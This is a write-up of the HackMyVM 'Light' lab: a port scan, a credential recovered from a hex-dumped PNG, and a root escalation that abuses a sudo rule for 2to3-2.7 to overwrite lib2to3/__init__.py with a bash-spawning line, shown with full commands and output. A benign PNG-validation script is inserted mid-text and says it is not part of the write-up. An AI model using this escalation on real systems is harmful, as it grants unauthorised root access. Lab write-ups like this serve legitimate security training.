HMV Light Summary
Scope
- Name: Light
- Difficulty: 2/10
- OS: Linux
- IP: light.hmv (192.168.56.105)
Foothold
A default nmap scan of light.hmv only shows one enabled SSH service, so I scan the target again
across all ports. Woo, another interesting port is open out there 👇
❯ sudo nmap -p- --min-rate 3000 -oN overall light.hmv
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 15:30 +0800
Nmap scan report for light.hmv (192.168.56.105)
Host is up (0.000070s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
45923/tcp open  unknown
MAC Address: 08:00:27:08:D8:13 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
What the service returns looks like a hex dump of a PNG image. BTW, the open port number changes each time I connect to it.
So I save that hex dump and restore it to a PNG image with:
xxd -r random.hex random.png
Yeah, there's a credential in it!
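The restore step above relies on `xxd -r`, which trusts the offset column and does no validation of what comes out. The helper below is an added example (not part of this writeup) that does the same reconstruction in Python and then checks that the result really is a PNG: correct signature, well-formed chunk layout, and a matching CRC on every chunk. It assumes the dump is in standard `xxd` format (offset, space-separated hex groups, then an ASCII column); the sample PNG and its hex dump are constructed inside the code.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def restore_hexdump(text):
    """Rebuild bytes from xxd-style lines ("offset: hex groups  ascii").

    Like `xxd -r`, the offset column decides where a row lands, so rows may
    arrive out of order and any gap between rows is zero-filled.
    """
    out = bytearray()
    for line in text.splitlines():
        if ":" not in line:
            continue  # blank or banner line, nothing to restore
        off_text, rest = line.split(":", 1)
        try:
            offset = int(off_text.strip(), 16)
            # Hex groups are separated by one space; two spaces start the ASCII column.
            hex_part = rest.strip().split("  ", 1)[0].replace(" ", "")
            row = bytes.fromhex(hex_part)
        except ValueError:
            continue  # not an xxd data line
        if len(out) < offset:
            out.extend(b"\x00" * (offset - len(out)))
        out[offset:offset + len(row)] = row
    return bytes(out)


def parse_png(data):
    """Validate the PNG signature and walk the chunk list, verifying each CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    info = {"chunks": [], "crc_ok": True}
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # length + type + data + crc
        if end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            info["crc_ok"] = False
        info["chunks"].append(ctype.decode("ascii"))
        if ctype == b"IHDR":
            (info["width"], info["height"],
             info["bit_depth"], info["color_type"]) = struct.unpack(">IIBB", body[:10])
        pos = end
        if ctype == b"IEND":
            break
    return info


# --- constructed sample: a 1x1 RGBA PNG and its xxd-format dump -------------

def _chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + \
        struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


def build_sample_png():
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)  # 1x1, 8-bit, RGBA
    raw = b"\x00" + b"\x00\x00\x00\x00"  # filter byte + one transparent pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def to_xxd(data):
    """Format bytes the way `xxd` prints them (16 bytes per row)."""
    lines = []
    for off in range(0, len(data), 16):
        row = data[off:off + 16]
        groups = " ".join(row[i:i + 2].hex() for i in range(0, len(row), 2))
        ascii_col = "".join(chr(b) if 32 <= b < 127 else "." for b in row)
        lines.append("%08x: %s  %s" % (off, groups.ljust(39), ascii_col))
    return "\n".join(lines) + "\n"


SAMPLE_HEXDUMP = to_xxd(build_sample_png())

if __name__ == "__main__":
    img = restore_hexdump(SAMPLE_HEXDUMP)
    print(parse_png(img))
```

If `crc_ok` comes back false, the dump was captured incompletely or altered in transit; that is the check `xxd -r` skips, and it is worth running before trusting anything the image contains.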
Privilege Escalation
Users with a login shell
lover@light:~$ grep 'sh$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
lover:x:1000:1000:lover,,,:/home/lover:/bin/bash
sudo rules
lover@light:~$ sudo -l
Matching Defaults entries for lover on light:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lover may run the following commands on light:
(ALL : ALL) NOPASSWD: /usr/bin/2to3-2.7
🤔 This is an interesting executable for me! And it's a Python script!
lover@light:~$ file /usr/bin/2to3-2.7
/usr/bin/2to3-2.7: a /usr/bin/python2.7 script, ASCII text executable

#! /usr/bin/python2.7
import sys
from lib2to3.main import main

sys.exit(main("lib2to3.fixes"))
It imports the lib2to3 package, so let's find it and take a look at what its main function offers.
lover@light:/usr/lib/python2.7/lib2to3$ 2to3-2.7 --help
Usage: 2to3 [options] file|dir ...

Options:
  -h, --help            show this help message and exit
  -d, --doctests_only   Fix up doctests only
  -f FIX, --fix=FIX     Each FIX specifies a transformation; default: all
  -j PROCESSES, --processes=PROCESSES
                        Run 2to3 concurrently
  -x NOFIX, --nofix=NOFIX
                        Prevent a transformation from being run
  -l, --list-fixes      List available transformations
  -p, --print-function  Modify the grammar so that print() is a function
  -v, --verbose         More verbose logging
  --no-diffs            Don't show diffs of the refactoring
  -w, --write           Write back modified files
  -n, --nobackups       Don't write backups for modified files
  -o OUTPUT_DIR, --output-dir=OUTPUT_DIR
                        Put output files in this directory instead of
                        overwriting the input files. Requires -n.
  -W, --write-unchanged-files
                        Also write files even if no changes were required
                        (useful with --output-dir); implies -w.
  --add-suffix=ADD_SUFFIX
                        Append this string to all output filenames. Requires
                        -n if non-empty. ex: --add-suffix='3' will generate
                        .py3 files.
This script converts Python 2 syntax into its Python 3 equivalent. The key point is that
the -o option lets me control where the result is written, so I can overwrite the __init__.py of
that package!
lover@light:~$ sudo /usr/bin/2to3-2.7 -n -w __init__.py -o /usr/lib/python2.7/lib2to3/
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored __init__.py
--- __init__.py	(original)
+++ __init__.py	(refactored)
@@ -1,3 +1,3 @@
-print "hello"
+print("hello")
 import os
 os.system("/bin/bash")
RefactoringTool: Writing converted __init__.py to /usr/lib/python2.7/lib2to3/__init__.py.
RefactoringTool: Files that were modified:
RefactoringTool: __init__.py
lover@light:~$ cat /usr/lib/python2.7/lib2to3/__init__.py
print("hello")
import os
os.system("/bin/bash")
lover@light:~$ sudo /usr/bin/2to3-2.7
hello
root@light:/home/lover# id
uid=0(root) gid=0(root) groups=0(root)
NOTE: The input file must contain some Python 2 syntax to trigger a conversion; otherwise nothing is converted and the target file is not overwritten.
That is why I start the file with print "hello".